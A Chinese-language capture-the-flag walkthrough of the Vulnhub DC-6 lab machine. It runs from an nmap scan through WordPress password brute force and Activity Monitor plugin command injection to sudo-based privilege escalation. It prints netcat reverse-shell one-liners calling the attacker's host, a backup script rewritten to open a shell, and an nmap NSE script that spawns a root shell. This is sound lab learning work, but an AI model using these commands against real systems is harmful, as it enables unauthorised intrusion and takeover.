【Vulnhub靶机】DC-6

多喝热水:http://hackergu.com

主机发现

​ 使用netdiscover命令,发现主机IP为192.168.203.132

端口探测

​ 使用Nmapnmap -sV -A 192.168.203.132 --script=vuln

​ 探测结果:

root@kali:~# nmap -sV -A 192.168.203.132 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-15 09:38 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.203.132
Host is up (0.00036s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /wp-login.php: Possible admin folder
|   /readme.html: Wordpress version: 2 
|   /wp-includes/images/rss.png: Wordpress version 2.2 found.
|   /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
|   /wp-includes/images/blank.gif: Wordpress version 2.6 found.
|   /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
|   /wp-login.php: Wordpress login page.
|   /wp-admin/upgrade.php: Wordpress login page.
|_  /readme.html: Interesting, a readme.
|_http-server-header: Apache/2.4.25 (Debian)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-wordpress-users: 
| Username found: admin
| Username found: graham
| Username found: mark
| Username found: sarah
| Username found: jens
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
|_https-redirect: ERROR: Script execution failed (use -d to debug)
| vulners: 
|   cpe:/a:apache:http_server:2.4.25: 
|     	CVE-2017-7679	7.5	https://vulners.com/cve/CVE-2017-7679
|     	CVE-2017-7668	7.5	https://vulners.com/cve/CVE-2017-7668
|     	CVE-2017-3169	7.5	https://vulners.com/cve/CVE-2017-3169
|     	CVE-2017-3167	7.5	https://vulners.com/cve/CVE-2017-3167
|     	CVE-2019-0211	7.2	https://vulners.com/cve/CVE-2019-0211
|     	CVE-2018-1312	6.8	https://vulners.com/cve/CVE-2018-1312
|     	CVE-2017-15715	6.8	https://vulners.com/cve/CVE-2017-15715
|     	CVE-2019-10082	6.4	https://vulners.com/cve/CVE-2019-10082
|     	CVE-2017-9788	6.4	https://vulners.com/cve/CVE-2017-9788
|     	CVE-2019-0217	6.0	https://vulners.com/cve/CVE-2019-0217
|     	CVE-2019-10098	5.8	https://vulners.com/cve/CVE-2019-10098
|     	CVE-2019-10081	5.0	https://vulners.com/cve/CVE-2019-10081
|     	CVE-2019-0220	5.0	https://vulners.com/cve/CVE-2019-0220
|     	CVE-2019-0196	5.0	https://vulners.com/cve/CVE-2019-0196
|     	CVE-2018-17199	5.0	https://vulners.com/cve/CVE-2018-17199
|     	CVE-2018-1333	5.0	https://vulners.com/cve/CVE-2018-1333
|     	CVE-2017-9798	5.0	https://vulners.com/cve/CVE-2017-9798
|     	CVE-2017-7659	5.0	https://vulners.com/cve/CVE-2017-7659
|     	CVE-2017-15710	5.0	https://vulners.com/cve/CVE-2017-15710
|     	CVE-2019-0197	4.9	https://vulners.com/cve/CVE-2019-0197
|     	CVE-2019-10092	4.3	https://vulners.com/cve/CVE-2019-10092
|     	CVE-2018-11763	4.3	https://vulners.com/cve/CVE-2018-11763
|_    	CVE-2018-1283	3.5	https://vulners.com/cve/CVE-2018-1283
MAC Address: 00:0C:29:FD:79:62 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.37 ms 192.168.203.132

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.90 seconds

这套靶机是要修改host文件的,具体可以参看我写的DC-2这篇文章。

因为做靶机做的习惯了,上来直接就看80端口,正好看到需要修改host文件,就直接修改了。

​ 从扫描的结果来看,目标机器开放了22端口和80端口,80端口的web服务是一个Wordpress站点,并且还扫出了一些用户名。

| Username found: admin
| Username found: graham
| Username found: mark
| Username found: sarah
| Username found: jens

获取Shell

​ 我们先去站点看一下:

【Vulnhub靶机】DC-6_第1张图片

​ 看到这句话,我就大致确定可能得寻找插件的漏洞。

WPscan

​ 日wpscan的站点,当然要使用wpscan了。但是我利用这两条命令,都没能扫出可用漏洞。

wpscan --url http://wordy/ -e vt   扫描主题的漏洞
wpscan --url http://wordy/ -e vp   扫描插件的漏洞

​ 那剩下的思路就应该是密码爆破了。

来到DC-6的网站看一下,发现一条提示:

【Vulnhub靶机】DC-6_第2张图片

​ 我们需要利用此命令生成一个词典:

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

​ 进行爆破:

wpscan --url http://wordy/ --passwords passwords.txt --usernames admin,graham,mark,sarah,jens 

​ 最终得到了一个账户和密码:

[i] Valid Combinations Found:
 | Username: mark, Password: helpdesk01

登录后台

​ 利用得到的账户和密码登陆后台:

【Vulnhub靶机】DC-6_第3张图片

​ 一番查看之后,发现此用户的权限并不高。

​ 但是,发现了一个有趣的插件activity monitor

【Vulnhub靶机】DC-6_第4张图片

Activity Monitor远程命令执行

​ 将此插件拿去百度搜了一下,发现此插件存在漏洞。

​ 不清楚wpscan为什么扫不出来呢?

【Vulnhub靶机】DC-6_第5张图片

​ 那接下来就利用此漏洞:

找到如下位置,然后写IP,点击lookup,抓包。

【Vulnhub靶机】DC-6_第6张图片

【Vulnhub靶机】DC-6_第7张图片

既然这样那就直接反弹shell吧。

nc 192.168.203.129 7777 -e /bin/bash

【Vulnhub靶机】DC-6_第8张图片

拿到shell了。

提权

使用了以下两个命令,都没有特别大的发现。

sudo -l
find / -user root -perm -4000 -print 2>/dev/null

习惯性的去了/home下,在mark文件夹下看到了一个文件:

cat things-to-do.txt 
Things to do:

- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement

​ 这里应该是创建了一个账户。

​ 并且还在jens用户夹中发现了一个脚本:

www-data@dc-6:/home$ cd jens
cd jens
www-data@dc-6:/home/jens$ ls
ls
backups.sh
www-data@dc-6:/home/jens$ cat backups.sh
cat backups.sh
#!/bin/bash
tar -czf backups.tar.gz /var/www/html

​ 不知道咋利用呀,先切换用户看看

​ 重点来了!!!

【Vulnhub靶机】DC-6_第9张图片

​ 此用户可以不需要密码得到jens的shell。

​ 那我们在kali中再设置一个监听,再反弹:

#!/bin/bash
nc 192.168.203.129 8888 -e /bin/bash

在这里,由于反弹shell不太方便vi编写,我又用ssh登录了。

​ 改写好脚本之后,我们使用jens账户执行此脚本。

sudo -u jens /home/jens/backups.sh

【Vulnhub靶机】DC-6_第10张图片

​ 现在我们拿到jens账户的shell了。

​ 再次sudo -l

【Vulnhub靶机】DC-6_第11张图片

​ 发现我们可以无需root密码执行nmap

​ nmap可以执行它自己的脚本文件,后缀为.nse

#!/bin/bash
nc 192.168.203.129 9999 -e /bin/bash

​ 这个地方卡了好久,本来想再反弹shell,但是这个这种反弹的编辑器太难受了。

​ 参考了大神的思路,使用:

echo 'os.execute("/bin/sh")' > root.nse

jens@dc-6:~$ echo 'os.execute("/bin/sh")' > root.nse
echo 'os.execute("/bin/sh")' > root.nse
jens@dc-6:~$ cat root.nse
cat root.nse
os.execute("/bin/sh")
jens@dc-6:~$ sudo nmap --script=root.nse
sudo nmap --script=root.nse

Starting Nmap 7.40 ( https://nmap.org ) at 2020-02-15 13:43 AEST
# whoami
root
# cd /root
# ls
theflag.txt
# cat theflag.txt


Yb        dP 888888 88     88         8888b.   dP"Yb  88b 88 888888 d8b 
 Yb  db  dP  88__   88     88          8I  Yb dP   Yb 88Yb88 88__   Y8P 
  YbdPYbdP   88""   88  .o 88  .o      8I  dY Yb   dP 88 Y88 88""   `"' 
   YP  YP    888888 88ood8 88ood8     8888Y"   YbodP  88  Y8 888888 (8) 


Congratulations!!!

Hope you enjoyed DC-6.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.

​ 提权成功!

你可能感兴趣的:(【Vulnhub靶机】DC-6)